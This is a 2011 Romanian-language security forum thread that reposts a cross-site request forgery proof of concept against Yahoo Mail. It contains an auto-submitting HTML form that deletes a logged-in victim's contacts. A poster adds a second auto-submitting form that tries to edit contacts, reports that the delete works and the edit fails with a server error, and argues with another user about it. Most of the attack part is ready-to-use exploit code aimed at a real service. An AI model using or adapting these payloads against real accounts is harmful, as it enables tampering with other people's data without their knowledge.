Pugna Posted December 5, 2011 Report Share Posted December 5, 2011 (edited) # Vulnerability found in- Yahoomail Delete Contact module # email prakhar.agrawal26@gmail.com # company AKS IT Services Pvt. Ltd # Credit by Prakar Agrawal # Email Service Yahoomail # Category Mail service # Site p4ge http://www.yahoomail.com # Plateform java # Proof of concept # Targeted URL: http://address.mail.yahoo.com/ Script to Delete the contacts from contact list through Cross Site request forgery . ................................................................................................................ <html> <body> <form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/DeleteContact.json?" method="POST"> <input type=hidden name="action" value="delete_contacts"> <input type=hidden name="id" value="$Numeric No.$"> </form> <script>document.csrf.submit();</script> </body> </html> . .................................................................................................................. Put any Numeric No. (i.e 1,2,3,4 etc) in id field parameter and try to forge the functionality. its working.....________________________________________________________________________L-am testat, functioneaza. Am incercat acelasi lucru si pentru editare, cu modificarile de rigoare:<html><body><form name="csrf" action="http://us.mg5.mail.yahoo.com/yab-fe/mu/EditContact.json?" method="POST"><input type=hidden name="action" value="edit_contact"><input type=hidden name="contact_id" value="16777820"><input type=hidden name="fields[0:1::16778515:1]" value="^[eOo]^[PrInCeSs]^"><input type=hidden name="fields[0:3::16778515:1]" value="DeeAYYY"><input type=hidden name="flags[8:::16778516:1]" value="8:::0:0"><input type=hidden name="fields[8:::16778516:1]" value="sw33t_babygirl_007"><input type=hidden name="flags[7::3:0:1]" value="7::3:0:0"><input type=hidden name="flags[7::0:0:1]" value="7::0:0:0"><input type=hidden name="flags[17:::0:1]" value="17:::0:0"><input type=hidden name="flags[18:::0:1]" value="18:::0:0"></form><script>document.csrf.submit();</script></body></html>Dar primesc un 500 Internal in headere. Ciudat e ca merge delete-ul. Care mai e utilitatea tokenului _crumb daca avem CSRF ? Edited December 6, 2011 by Pugna Quote Link to comment Share on other sites More sharing options...
eth0 Posted December 5, 2011 Report Share Posted December 5, 2011 Dar primesc un 500 Internal in headere.Ciudat e ca merge delete-ul. Care mai e utilitatea tokenului _crumb daca avem CSRF ? pai posteaza la "ajutor" sau la "cereri" daca nu stii exact ce face "presupusul" exploit Quote Link to comment Share on other sites More sharing options...
Pugna Posted December 6, 2011 Author Report Share Posted December 6, 2011 pai posteaza la "ajutor" sau la "cereri" daca nu stii exact ce face "presupusul" exploitBre, ai citit bine ce am scris ? Daca din postul meu ai tras concluzia ca nu stiu eu cu ce se mananca inseamna ca tu n-ai nicio treaba. Am mai incercat sa il pacalesc pentru editare, dar n-am reusit, tot 500 primesc. Oricum nu prea are utilitate, tinand cont si de faptul ca id-urile numerice sunt generate. Quote Link to comment Share on other sites More sharing options...
